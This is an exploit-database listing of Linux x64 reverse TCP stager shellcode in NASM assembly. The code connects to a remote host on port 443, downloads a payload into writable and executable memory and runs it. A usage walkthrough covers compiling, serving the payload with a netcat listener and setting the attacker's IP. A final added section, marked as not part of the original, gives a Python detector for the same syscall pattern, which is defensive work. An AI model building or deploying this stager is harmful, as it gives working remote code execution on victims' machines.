0day.today - The largest exploit database in the world.
Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)
```nasm
;# Title: Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)
;# Author: Lee Mazzoleni
;# Tested on: Ubuntu 18.04.2 LTS

; reverse tcp stager - download and execute up to 4096 bytes of additional payload - no null bytes in this
; this code is 188 bytes total (less if you delete the exit() syscall at the end)

global _start
section .text
_start:
    ;// =================>
    ;// HEAP ALLOCATION =>
    ;// =================>
    xor rax, rax
    mov al, 6
    mov cl, 2
    imul ax, cx                     ;// int brk()
    xor rdi, rdi
    syscall                         ;// brk()
    xor rax, rax
    mov al, 2
    mov cl, 6
    imul ax, cx
    xor rdi, rdi
    mov dil, 128
    imul di, 32
    syscall                         ;// brk(0x1000) - 4096 bytes
    xchg rcx, rax                   ;// save addr of our allocated memory in rcx

    ;//=======================>
    ;// MAP HEAP PERMISSIONS =>
    ;//=======================>
    xor rax, rax
    mov al, 9
    xchg rdi, rcx
    xor rsi, rsi
    mov sil, 128
    imul si, 32
    xor rdx, rdx
    mov dl, 0x7
    xor r10, r10
    mov r10b, 0x21
    xor r9, r9
    mov r8, -1
    syscall                         ;// mmap(addr, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0)
    mov r9, rax                     ;// save heap address in r9

    ;// ===================>
    ;// SOCKET CONNECTION =>
    ;// ===================>
    xor rax, rax
    mov al, 41                      ;// int socket()
    xor rdi, rdi
    inc rdi
    inc rdi                         ;// AF_INET
    xor rsi, rsi
    inc rsi                         ;// SOCK_STREAM
    xor rdx, rdx
    mov dl, 6                       ;// IPPROTO_TCP
    syscall                         ;// socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
    push rax
    pop rdi                         ;// save the socket's fd in rdi for connect() to use
    xor rax, rax
    push rax
    mov dword [rsp-4], 0x2a37a8c0   ;// 192.168.55.42
    mov word [rsp-6], 0xbb01        ;// port 443 in lil' endian
    sub rsp, 6
    push word 0x2
    xor rax, rax
    mov al, 42                      ;// int connect()
    mov rsi, rsp
    xor rdx, rdx
    mov dl, 16
    syscall                         ;// connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16)

    ;// ====================================>
    ;// READ CODE FROM SOCKET FD INTO HEAP =>
    ;// ====================================>
    mov rsi, r9                     ;// heap addr still saved in r9
    xor rdx, rdx
    mov dl, 41                      ;// CHANGE THIS NUMBER TO SUIT THE SIZE OF YOUR PAYLOAD (41-byte payload used in testing)
    xor rax, rax
    syscall                         ;// read(3, heap_addr, SIZE)

    ;// =================>
    ;// CLOSE SOCKET FD =>
    ;// =================>
    xor rax, rax
    mov al, 3
    syscall                         ;// close(3)
    jmp r9                          ;// jmp to the heap address in r9 and execute the downloaded payload

    ;// =========>
    ;// EXIT(0) => this bit is unnecessary if your payload already calls exit()
    ;// =========>
    xor rax, rax
    mov al, 60
    xor rdi, rdi
    syscall

; ===============>
; ===== Usage ===>
; ===============>
; =========================================================================================
; this program downloads a secondary payload from a remote host, and executes it.
; in this example, the payload used will be a simple hello-world-like program (hello.asm):
; =========================================================================================
; global _start
; section .text
; _start:
;     mov rax, 1
;     mov rdi, 1
;     mov rsi, 0x0a21216f6c6c6548 ; "Hello!!\n"
;     push rsi
;     mov rsi, rsp
;     mov rdx, 8
;     syscall
;     mov rax, 60
;     xor rdi, rdi
;     syscall
; =========================================================================================
; 1.) compile your payload:
; -----------------------------------------------------------------------------------------
; nasm -f elf64 hello.asm -o hello.o && ld hello.o -o hello && rm hello.o
; =========================================================================================
; 2.) retrieve the opcodes for the payload:
; -----------------------------------------------------------------------------------------
; objdump -d hello|grep -v '^$\|start>\|file format\|Disassembly'|cut -d' ' -f2-9|sed -E "s/\ [0-9a-f]{6}://g"|grep -Eo '[a-f0-9]{2}'|tr -d '\n' ; echo
; b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05
; =========================================================================================
; 3.) count how many bytes are in your payload (41 bytes) and update line 86 to reflect this:
; -----------------------------------------------------------------------------------------
; echo b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05|grep -Eo '[a-f0-9]{2}'|wc -l
; 41
; =========================================================================================
; 4.) decode the bytes into raw form and serve it via netcat listener:
; -----------------------------------------------------------------------------------------
; echo -n b801000000bf0100000048be48656c6c6f21210a564889e6ba080000000f05b83c0000004831ff0f05 | xxd -r -p > payload
; nc -lvp 443 < payload
; listening on [any] 443 ...
; =========================================================================================
; 5.) one last step before compiling this stager, add your own IP address to line 69:
; -----------------------------------------------------------------------------------------
; import struct, socket
; print(hex(struct.unpack('<L', socket.inet_aton('192.168.55.42'))[0]))
; 0x2a37a8c0
; =========================================================================================
; 6.) compile and run this shellcode - it will connect to your netcat listener, download & exec the raw payload
; -----------------------------------------------------------------------------------------
; nasm -f elf64 stager.asm -o stager.o && ld stager.o -o stager && rm stager.o
; ./stager
; Hello!!
```
# 0day.today [2024-07-02] #
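Added example (not part of the original listing or the author's code): a detector for the behaviour the stager's comments describe, namely a `read()` from a connected socket into an anonymous mapping that is both writable and executable. The trace lines are constructed, the raw `read()` format assumes capture with `strace -e raw=read`, and `find_staged_loads` is a hypothetical name.

```python
import re

# Constructed strace-style lines (not captured from a real host); read() is
# shown with raw arguments, as assumed for `strace -e raw=read`.
SAMPLE_TRACE = """\
brk(NULL) = 0x1c9b000
mmap(0x1c9b000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, -1, 0) = 0x7f3a1c2d4000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("192.168.55.42")}, 16) = 0
read(0x3, 0x7f3a1c2d4000, 0x29) = 0x29
close(3) = 0
"""

MMAP = re.compile(r"^mmap\((?:NULL|0x[0-9a-f]+), (\d+), ([A-Z_|]+), ([A-Z_|0-9x]+), .*\) = (0x[0-9a-f]+)")
CONNECT = re.compile(r'^connect\((\d+), \{sa_family=AF_INET, sin_port=htons\((\d+)\), '
                     r'sin_addr=inet_addr\("([\d.]+)"\)\}, \d+\) = 0')
READ = re.compile(r"^read\((0x[0-9a-f]+), (0x[0-9a-f]+), (0x[0-9a-f]+)\) = (0x[0-9a-f]+)")
CLOSE = re.compile(r"^close\((\d+)\) = 0")


def find_staged_loads(trace):
    """Return one finding per read() that fills a W+X anonymous mapping from a connected socket."""
    wx_maps = []   # (start, end) of anonymous mappings that are writable and executable
    peers = {}     # fd -> (ip, port) for sockets with a successful connect()
    findings = []
    for line in trace.splitlines():
        if m := MMAP.match(line):
            size, prot, flags, addr = int(m[1]), m[2].split("|"), m[3].split("|"), int(m[4], 16)
            if {"PROT_WRITE", "PROT_EXEC"} <= set(prot) and "MAP_ANONYMOUS" in flags:
                wx_maps.append((addr, addr + size))
        elif m := CONNECT.match(line):
            peers[int(m[1])] = (m[3], int(m[2]))
        elif m := CLOSE.match(line):
            peers.pop(int(m[1]), None)   # fd may be reused later for a file
        elif m := READ.match(line):
            fd, buf, got = int(m[1], 16), int(m[2], 16), int(m[4], 16)
            if fd in peers and got > 0 and any(lo <= buf < hi for lo, hi in wx_maps):
                findings.append({"fd": fd, "peer": peers[fd], "buffer": hex(buf), "bytes": got})
    return findings
```

The same correlation (W+X anonymous mapping, outbound connect, socket read landing in that mapping) can be expressed in any syscall-level telemetry source; the peer address in each finding is the value to pivot on in network logs.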